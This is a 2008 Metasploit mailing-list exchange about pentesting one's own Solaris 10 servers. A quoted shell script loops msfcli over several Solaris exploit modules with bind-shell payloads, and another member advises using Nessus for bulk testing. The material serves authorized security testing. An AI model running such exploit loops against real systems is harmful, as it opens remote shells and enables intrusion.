
List:       metasploit-framework
Subject:    Re: [framework] try to exploit everything
From:       "arthur" <mail2arthur () gmail ! com>
Date:       2008-07-25 18:15:38
Message-ID: 000f01c8ee82$74bd6eb0$9b080f0a () usr ! ingenico ! loc

Thanks. Actually MSF is the 3rd section in my report. The first section is
using nmap to discover the IPs/ports, the 2nd section is a Nessus blind scan
with all plugins enabled (also unchecked the safeCheck and turned on the
throughTests), but the auditor still likes to see more with MSF :(

Just trying to find an easy way to make the guy happy instead of talking too
much.

You know what, even though our server is not running a web app, he still asks
for a test of XSS...

Arthur

> Arthur,
>
> For this kind of testing, Metasploit is the wrong tool for the job.
> If you just want to huck a bunch of exploits at the target without
> regard for whether they might actually work, try something like Nessus
> instead.
>
> Hope this helped,
> egypt
>
> 2008/7/25 arthur <mail2arthur@gmail.com>:
> > Hi All,
> >
> > We are pentesting our Solaris 10 servers and so far I built a script to
> > call msfcli to try all the Solaris modules (even Solaris 8/9, partial
> > script below). However the auditor likes to see we try ALL to make sure
> > the server/app won't go down after a silly hacker tries a wrong attack.
> >
> > With RHOST set globally, is there any easy way to run all?
> >
> > Thanks,
> >
> > Arthur
> >
> > ...
> > APP=./msfcli
> > ADD="..."
> > PL1=cmd/unix/bind_perl
> > PL2=generic/shell_bind_tcp
> >
> > test_run()
> > {
> >   cmd=$@
> >   echo $cmd
> >   echo $cmd>>$FN
> >   sudo $cmd>>$FN 2>&1
> > }
> >
> > for addr in $ADD ; do
> >   test_run $APP solaris/dtspcd/heap_noir RHOST=$addr C
> >   test_run $APP solaris/lpd/sendmail_exec RHOST=$addr PAYLOAD=$PL1 E
> >   test_run $APP solaris/samba/lsa_transnames_heap RHOST=$addr PAYLOAD=$PL2 E
> >   test_run $APP solaris/samba/trans2open RHOST=$addr PAYLOAD=$PL2 TARGET=0 E
> >   test_run $APP solaris/sunrpc/sadmind_exec RHOST=$addr PAYLOAD=$PL1 E
> >   test_run $APP solaris/sunrpc/ypupdated_exec RHOST=$addr PAYLOAD=$PL1 E
> >   test_run $APP solaris/telnet/fuser RHOST=$addr PAYLOAD=$PL1 E
> >   test_run $APP solaris/telnet/ttyprompt RHOST=$addr PAYLOAD=$PL1 E
> > done
> > ...
> > _______________________________________________
> > http://spool.metasploit.com/mailman/listinfo/framework
> >
> >
